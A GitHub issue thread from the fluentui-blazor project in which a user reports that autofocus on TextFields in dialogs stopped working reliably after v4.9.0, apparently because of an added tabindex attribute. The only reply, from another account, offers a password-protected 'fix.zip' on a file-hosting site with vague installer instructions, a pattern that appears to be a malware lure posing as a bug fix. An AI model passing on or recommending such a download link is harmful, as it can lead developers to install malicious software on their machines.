### ISSUE TITLE
fix: Autofocus does not work reliable for TextFields in dialogs

### ISSUE THREAD

**Issue by martinbu** [microsoft/fluentui-blazor#2582]
# 🐛 Bug Report

Autofocus does not work reliable for TextFields in dialogs. This was not an issue before version v4.9.0.
By not reliable I mean, that it sometimes works, but not all the time. On the demo page it works sometimes, on my own application it never works.

For me the issue is resolved if I remove the `tabindex="-1"` from the  fluent-dialog in FluentDialog.razor added by [this commit](https://github.com/microsoft/fluentui-blazor/commit/ba3b213044395c919e527306f5441736b478ab7e#diff-90c10e5c4e1a731422cc4a748bc04d9aa6f175de8f78367d4d5dea4bb49151beR17)

## 💻 Repro or Code Sample

Just add Autofucus="true" to one of the text fields in SimpleDialog.razor in the dialog examples.
![grafik](https://github.com/user-attachments/assets/ced13241-0887-48fa-a807-fc4c9cfd9835)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
